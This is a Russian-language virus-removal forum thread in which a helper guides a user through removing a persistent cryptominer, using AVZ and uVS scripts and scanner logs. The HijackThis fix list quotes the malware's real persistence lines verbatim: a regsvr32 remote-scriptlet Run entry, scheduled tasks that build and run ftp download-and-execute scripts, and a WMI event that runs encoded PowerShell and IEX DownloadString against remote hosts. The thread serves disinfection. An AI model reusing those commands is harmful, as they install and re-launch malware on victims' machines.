Перейти к содержанию
Правила раздела

Вирус conhost.exe TODO: <文件说明> создающий файлы mysa1/2/3ok

Werero

От Werero
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

Werero Постоялец

Werero

Опубликовано
Опубликовано (изменено)

Пытался всеми способами удалить вирус, запускал в безопасном режиме, чистил следы в реестре что мог найти, он всегда возобновляется, пытался даже переименовать его что бы он якобы оставался в системе но уже не делал тех функций зачем он создан, он даже после этого создался и получилось с каждого файла по 2 мой измененный фейк и новый настоящий. Еще в автозагрузке системы стоит элемент под название "операционная система", оно не отключается и после перезапуска всегда включено, нашел путь в реестре, если изменить изменить двоичные данные получаются китайские иероглифы, которые в свойствах того же conhost. KVRT и Dr. Webb curelt их находит, удаляет и после перезапуска оно снова появляется. Сделал пару скринов и прикреплю логи.

post-52560-0-10556200-1547308022_thumb.png

post-52560-0-88258800-1547308022_thumb.png

post-52560-0-84871600-1547308023_thumb.png

post-52560-0-71360200-1547308024_thumb.png

post-52560-0-06176600-1547308025_thumb.png

CollectionLog-2019.01.12-17.35.zip

Изменено пользователем Werero
Ссылка на комментарий
Поделиться на другие сайты
  • Ответов 50
  • Created
  • Последний ответ

Top Posters In This Topic

  • Werero

    26

  • regist

    25

Popular Days

Top Posters In This Topic

Popular Days

Posted Images

regist Корифей

regist

Опубликовано
Опубликовано

Здравствуйте!

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 ClearQuarantineEx(true);
 TerminateProcessByName('c:\windows\temp\conhost.exe');
 QuarantineFile('a.exe', '');
 QuarantineFile('c:\windows\debug\item.dat&gt', '');
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('c:\windows\debug\ok.dat', '');
 QuarantineFile('c:\windows\temp\conhost.exe', '');
 DeleteFile('c:\windows\debug\item.dat&gt', '32');
 DeleteFile('c:\windows\debug\item.dat', '32');
 DeleteFile('c:\windows\debug\ok.dat', '32');
 DeleteFile('c:\windows\temp\conhost.exe', '');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('ok');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start', 'command', '32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start', '32');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в АВЗ:
begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)
 
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.

 

+

  1. Загрузите GMER по одной из указанных ссылок:
    Gmer со случайным именем (рекомендуется), Gmer в zip-архиве (перед применением распаковать в отдельную папку)
  2. Временно отключите драйверы эмуляторов дисков.
  3. Запустите программу (пользователям Vista/Seven запускать от имени Администратора по правой кнопке мыши).
  4. Начнется экспресс-проверка. Если появится окно с сообщением о деятельности руткита, нажмите No.
  5. Из всех дисков оставьте отмеченным только системный диск (обычно C:\)
  6. Нажмите на кнопку Scan и дождитесь окончания проверки. При появлении окна с сообщением о деятельности руткита, нажмите OK.
  7. После окончания проверки сохраните его лог (нажмите на кнопку Save) и вложите в сообщение.

    !!! Обратите внимание
    , что утилиты необходимо запускать от имени Администратора. По умолчанию в
    Windows XP
    так и есть. В
    Windows Vista
    и
    Windows 7
    администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать
    Запуск от имени Администратора
    , при необходимости укажите пароль администратора и нажмите
    "Да"
    .


Подробную инструкцию читайте в руководстве.
 

Ссылка на комментарий
Поделиться на другие сайты
Werero Постоялец

Werero

Опубликовано
  • Автор
Опубликовано

1.После удаления первым скриптом и перезапуска пк появилась та же ошибка что и каждый раз после попытки удаления, все файлы снова возобновились, ошибка:

RunDLL:
Возникла ошибка при запуске C:\Windows\debug\item.dat
Не найден указанный модуль

После этого все файлы восстанавливаются.

2.Re: [KLAN-9443364848]

Благодарим за обращение в Антивирусную Лабораторию
 
Присланные вами файлы были проверены в автоматическом режиме.
 
В следующих файлах обнаружен вредоносный код:
conhost.exe - Trojan.Win64.Miner.ijc
 
Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.
 
Это сообщение сформировано автоматической системой обработки писем. Пожалуйста, не отвечайте на него.
 
Антивирусная Лаборатория, Kaspersky Lab HQ

3.Повторные логи и GMER ниже прикреплю

 

CollectionLog-2019.01.12-19.28.zip

GMER.log

Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

Здравствуйте!

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 ClearQuarantineEx(true);
 TerminateProcessByName('c:\windows\temp\conhost.exe');
 QuarantineFile('a.exe', '');
 QuarantineFile('c:\windows\debug\item.dat&gt', '');
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('c:\windows\debug\ok.dat', '');
 QuarantineFile('c:\windows\temp\conhost.exe', '');
 DeleteFile('c:\windows\debug\item.dat&gt', '32');
 DeleteFile('c:\windows\debug\item.dat', '32');
 DeleteFile('c:\windows\debug\ok.dat', '32');
 DeleteFile('c:\windows\temp\conhost.exe', '');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('ok');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start', '32');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в АВЗ:
begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)

 

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll
O4 - HKU\S-1-5-19\..\Run: [Sidebar] = C:\Program Files\Windows Sidebar\Sidebar.exe /autoRun (file missing)
O4 - HKU\S-1-5-20\..\Run: [Sidebar] = C:\Program Files\Windows Sidebar\Sidebar.exe /autoRun (file missing)
O4 - MSConfig\startupreg: CCleaner Monitoring [command] = (HKCU) (2018/08/27) (no file)
O4 - MSConfig\startupreg: CCleaner Smart Cleaning [command] = (HKCU) (2018/10/27) (no file)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = (HKCU) (2018/06/16) (no file)
O4 - MSConfig\startupreg: Java x86 applicate [command] = (HKCU) (2018/06/01) (no file)
O4 - MSConfig\startupreg: start [command] = (HKLM) (2019/01/12) (no file)
O7 - IPSec: Name: win (2019/01/12) - {d6f9692f-2683-44a2-9165-44aa2dd03941} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/01/12) - {d6f9692f-2683-44a2-9165-44aa2dd03941} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/01/12) - {d6f9692f-2683-44a2-9165-44aa2dd03941} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/01/12) - {d6f9692f-2683-44a2-9165-44aa2dd03941} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/01/12) - {d6f9692f-2683-44a2-9165-44aa2dd03941} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: Opera scheduled Autoupdate 1515162180 - C:\Program Files\Opera\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll

 

  1. Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;
  2. Запустите файл TDSSKiller.exe.
  3. Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.
  4. В процессе проверки могут быть обнаружены объекты двух типов:
    • вредоносные (точно было установлено, какой вредоносной программой поражен объект);
    • подозрительные (тип вредоносного воздействия точно установить невозможно).

[*]По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием. [*]Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить. [*]Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить). [*]Самостоятельно без указания консультанта ничего не удаляйте!!! [*]После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат. [*]Прикрепите лог утилиты к своему следующему сообщению

По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).
Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt
Например, C:\TDSSKiller.3.0.0.44_10.05.2015_13.39.01_log.txt

 
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.

Ссылка на комментарий
Поделиться на другие сайты
Werero Постоялец

Werero

Опубликовано
  • Автор
Опубликовано

1. Выполнил снова этот скрипт, все так же после перезапуска появилось
2. Re: [KLAN-9444027882]

Благодарим за обращение в Антивирусную Лабораторию
 
Присланные вами файлы были проверены в автоматическом режиме.
 
В следующих файлах обнаружен вредоносный код:
conhost.exe - Trojan.Win64.Miner.ijc
 
Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.
 
Это сообщение сформировано автоматической системой обработки писем. Пожалуйста, не отвечайте на него.
 
Антивирусная Лаборатория, Kaspersky Lab HQ

3. Пофиксил
4. Почему-то угроз не обнаружено, вот логи.
 

Еще один лог, забыл сразу 


Туплю с форумом, простите.

TDSSKiller.3.1.0.25_12.01.2019_22.37.06_log.txt

CollectionLog-2019.01.12-22.57.zip

Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

Здравствуйте!

1) Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 ClearQuarantineEx(true);
 TerminateProcessByName('c:\windows\temp\conhost.exe');
 QuarantineFile('c:\windows\temp\conhost.exe', '');
 DeleteFile('c:\windows\temp\conhost.exe', '');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 2, true);
BC_Activate;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 

2) - Перетащите лог Check_Browsers_LNK.log из папки AutoLogger\CheckBrowsersLNK на утилиту ClearLNK. Отчёт о работе прикрепите.

3)  Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.

 

4) Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:

  1. Запустите AVZ.
  2. Запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
  3. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
  4. Закачайте полученный архив, как описано на этой странице.
  5. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: Яндекс.Диск, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.


 

 

5) Проверьте, что с проблемой?


+

SpyHunter4 [2019/01/11 13:37:06]-->C:\Program Files\SpyHunter\Удалить SpyHunter.exe

деинсталируйте.

Ссылка на комментарий
Поделиться на другие сайты
Werero Постоялец

Werero

Опубликовано
  • Автор
Опубликовано

1. Выполнение скрипта завершилось и после был неккоректный перезапуск, черный экран пришлось перезапускать вручную через блок питания, думаю скрипт завершился правильно, после перезапуска файл был удален но после конечно же возобновился
2. Все логи ниже будут
3. Закачал файл
4. Удалил spyhunter

ClearLNK-2019.01.13_00.08.49.log

CollectionLog-2019.01.13-00.17.zip

Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования,      

  1. Скачайте Universal Virus Sniffer (uVS)
  2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

    !!!Внимание.
    Если у вас установлены архиваторы
    WinRAR
    или
    7-Zip
    , то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

  4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.

    !!! Обратите внимание
    , что утилиты необходимо запускать от имени Администратора. По умолчанию в
    Windows XP
    так и есть. В
    Windows Vista
    и
    Windows 7
    администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать
    Запуск от имени Администратора
    , при необходимости укажите пароль администратора и нажмите
    "Да"
    .




 

Ссылка на комментарий
Поделиться на другие сайты
Werero Постоялец

Werero

Опубликовано
  • Автор
Опубликовано (изменено)

1. Скачал AutorunsVTchekcker, проверка закончилась, но вы не сказали нужно ли прикреплять логи этой программы и есть ли они вообще, если да то я не знаю в каком месте они хранятся, не вижу в папке с программой
2. Все сделал, логи внизу

ВОВА-ПК_2019-01-13_12-30-46_v4.1.2.7z

Изменено пользователем Werero
Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

 

 


но вы не сказали нужно ли прикреплять логи этой программы и есть ли они вообще
про это указано в описание утилиты по ссылке (логов нет).

 

  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    ;uVS v4.1.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
BREG
;---------command-block---------
delref S.DAT
delref F:\DMC.DEVIL.MAY.CRY.VIRGILS.DOWNFALL.DLC.EXE
zoo %SystemDrive%\USERS\3C5C~1\APPDATA\LOCAL\TEMP\CHROME_BITS_1976_25556\4908_ALL_CRL-SET-11285574569882646471.DATA.CRX3
delall %SystemDrive%\USERS\3C5C~1\APPDATA\LOCAL\TEMP\CHROME_BITS_1976_25556\4908_ALL_CRL-SET-11285574569882646471.DATA.CRX3
zoo %SystemDrive%\USERS\3C5C~1\APPDATA\LOCAL\TEMP\CHROME_BITS_1816_3900\A757E0B67A76B0BDDC240D42227C94F4F4AB29E9389B408A8481BF530A0FB946.CRXD
delall %SystemDrive%\USERS\3C5C~1\APPDATA\LOCAL\TEMP\CHROME_BITS_1816_3900\A757E0B67A76B0BDDC240D42227C94F4F4AB29E9389B408A8481BF530A0FB946.CRXD
delref HTTP://JS.1226BYE.XYZ:280/V.SCT
delref %Sys32%\DRIVERS\09738533.SYS
delref %Sys32%\DRIVERS\10457206.SYS
delref %Sys32%\DRIVERS\19613695.SYS
delref %Sys32%\DRIVERS\40198824.SYS
delref %Sys32%\DRIVERS\53645255.SYS
delref %Sys32%\DRIVERS\54770812.SYS
delref %Sys32%\DRIVERS\57400693.SYS
delref %Sys32%\DRIVERS\74282248.SYS
delref %Sys32%\DRIVERS\91544570.SYS
delref A.EXE
delref PS&AMP;C:\WINDOWS\HELP\LSMOSEE.EXE
zoo %SystemRoot%\DEBUG\ITEM.DAT
delall %SystemRoot%\DEBUG\ITEM.DAT
zoo %SystemRoot%\DEBUG\OK.DAT
delall %SystemRoot%\DEBUG\OK.DAT
delref S.RAR
delref S&AMP;C:\WINDOWS\UPDATE.EXE
delref WMI:\\.\ROOT\SUBSCRIPTION\__INTERVALTIMERINSTRUCTION\FUCKYOUMM2_ITIMER
delref %SystemDrive%\USERS\ВОВА\DOWNLOADS\17XC39QR.EXE
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref S&C:\WINDOWS\UPDATE.EXE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.17\PSMACHINE.DLL
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
bl BF69865A3ACD3379B0A8D870CCD43618 113
zoo %SystemRoot%\WEB\N.VBS
delall %SystemRoot%\WEB\N.VBS
apply

czoo
restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
  6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)

    Если архив отсутствует, то
    с паролем
    virus
    .

  7. Полученный архив отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

 

после этого соберите свежий лог uVS.
 

Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

1)

  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    ;uVS v4.1.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
BREG
deltmp
;---------command-block---------
delref S.DAT
bl DB0E205613407C4E260BCB585270D8CD 782848
zoo %SystemRoot%\TEMP\CONHOST.EXE
delall %SystemRoot%\TEMP\CONHOST.EXE
delref HTTP://173.208.139.170/2.TXT
delref HTTP://35.182.171.137/3.TXT
delref HTTP://JS.1226BYE.XYZ:280/V.SCT
delref HTTP://WMI.1217BYE.HOST/1.TXT
delref A.EXE
delref PS&AMP;C:\WINDOWS\HELP\LSMOSEE.EXE
zoo %SystemRoot%\DEBUG\OK.DAT
delall %SystemRoot%\DEBUG\OK.DAT
delref S.RAR
zoo %SystemRoot%\DEBUG\ITEM.DAT
delall %SystemRoot%\DEBUG\ITEM.DAT
delref S&AMP;C:\WINDOWS\UPDATE.EXE
apply

czoo
restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
  6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)

    Если архив отсутствует, то
    с паролем
    virus
    .

  7. Полученный архив отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

 

2) 1. Скачайте утилиту на рабочий стол.
2. Запустите KVRT и подтвердите согласие с условиями использования
3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите [/b]"Ок"
5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме

 

3) Соберите свежий образ автозапуска uVS.
 

Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

1) Выполните скрипт uVS

;uVS v4.1.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
BREG
;---------command-block---------
bl DB0E205613407C4E260BCB585270D8CD 782848
zoo %SystemRoot%\TEMP\CONHOST.EXE
delall %SystemRoot%\TEMP\CONHOST.EXE
delref HTTP://173.208.139.170/2.TXT
delref HTTP://35.182.171.137/3.TXT
delref HTTP://JS.1226BYE.XYZ:280/V.SCT
delref S.DAT
delref HTTP://WMI.1217BYE.HOST/1.TXT
delref A.EXE
delref S&AMP;C:\WINDOWS\UPDATE.EXE
delref S.RAR
zoo %SystemRoot%\DEBUG\ITEM.DAT
delall %SystemRoot%\DEBUG\ITEM.DAT
delref PS&AMP;C:\WINDOWS\HELP\LSMOSEE.EXE
zoo %SystemRoot%\DEBUG\OK.DAT
delall %SystemRoot%\DEBUG\OK.DAT
apply

czoo
restart

но скорее всего он опять не справится.

 

2) У вас Live CD/USB есть ? Если есть загрузить с него. Затем с него запустите uVS. В стартовом окне нажмите Выбрать каталог windows - укажите путь к папке со своей виндоус (заражённой) и соберите лог.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • Ammorf
      Kaspersky Security Center: Не создается файл отчета в PDF
      От Ammorf
      OS - Windows Server 2012, установлены .NET Framework 3.5 и 4.8
      KSC - 14.2.0.26967

      При попытке выгрузки отчета в формате pdf возникает ошибка "Не удалось создать отчет. Unspecified error".
      Ошибка возникает только при попытке выгрузки на самом сервере, если делать через консоль на обычной win 10 машине - все ок.
      Однако из-за того, что он не может делать это на сервере - он так же не может их отправлять по почте или класть в папку в соответствии с расписанием. 
      В логах "Kaspersky Event log", "Kaspersky Security" и системных логах не создается ничего при воспроизведении такой ошибки.
      Правка реестра (HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage) со сменой локализации не помогает, к тому же изначально была установлена правильная  1251.
      .NET Framework 3.5 и 4.8 - установлен

    • Freudis
      Вирусы под систем файлами
      От Freudis
      После недавно установленного zip файла компьютер начал тупить, нагреваться и шуметь. Данный файл не запрашивал права администратора да и сам файл я не запускал. Проверял компьютер куреитами, ничего не нашли. Один касперский обнаружил 1 файл, но этот файл был под именем систем файла, точный файл не знаю, но в процессе лечения после перезагрузки я решил открыть диспетчер задач, выявило ошибку "нет доступа или администратор запретил доступ". Решил запустить хоть гугл, та же ошибка. Перевзловнованный выдернул из розетки включатель компьютера, доступ ко всему вернулся, касперский ничего не сделал, но после этого компьютер начал нагреваться и в один момент очень сильно зашумел, я начал подозревать что есть вирусы под именем системных файлов, ведь зная касперский, лишь он нашёл 1 вирус и именно при его удалении с перезагрузкой доступ пропал к приложениям. Перерыл интернет, ноль информации. Но и заканчивать работу каких нибудь svchost.exe или подобное я очень боюсь. Решил обратиться за помощью к единственному кто нашёл этот вирус. Помогите, пожалуйста.
      У меня windows 10
       
    • Mrak
      Как с помощью Siri создать задачи в Google tasks
      От Mrak
      Всем привет!
       
      Подскажите пожалуйста, как с помощью Siri создать задачу в Google tasks?
       
      Мотивировка:
      Голосовой помощник идеально справляется с добавлением задач (напоминаний) во встроенные напоминания. Говоришь: привет сири, напомни мне завтра сходить за хлебом в 14 часов. Будет создано напоминание. Можно сказать "добавь в семейные напоминания на завтра сходить за хлебом". И он добавит в синхронизируемые общие напоминания семьи, чтобы кто-то сходил. В мире обеспеченных людей всё это должно работать идеально, ведь напоминания синхронизируются на всех устройствах эпл. Но на работе комп с виндой. Нет на нём эпловских напоминаний. Зато есть гугловый календарь и задачи. Они работают и на айфоне. И календарь идеально синхронизируется с айфоном (просто пользуешься учёткой гугла во встроенном календаре). Однако, с задачами так не выйдет. Ручками добавляются. Через гугл календарь добавляются. А голосом по любому быстрее. Прям намного. Раз этак в 10. Поэтому хочется научиться голосом на айфоне создавать задачи в гугл календаре. Если это технически возможно, конечно. Прошу помощи. 
       
    • Grotri
      [РЕШЕНО] Поймал майнер, после удаления файл создается снова
      От Grotri
      Поймал на свой компьютер вирус майнер который сидит вот тут C:/Program Files/Google/Chrome/updater.exe, после удаления файла запускается cmd.exe и создает файл заново (обнаружил с помощью Process Explorer)
      Помогите избавиться от него пожалуйста, прогонял скан системы через Farbar Recovery Scan Tool и, кажется, там есть за что зацепиться, но fixlist своими руками делать страшновато из-за незнания как делать корректно. Прикрепил логи оттуда сюда 
      Addition.txt FRST.txt
    • barss2001
      Вирус-шифровальщик зашифровал файлы Файл "7DYEDHQU59C"
      От barss2001
      Сервер после перезагрузки и входе в учетную запись показал сообщение о выкупе программы дешифратора на рабочем столе и дисках появились  зашифрованые файлы 
      virus.rar FRST64.rar
×
×
  • Создать...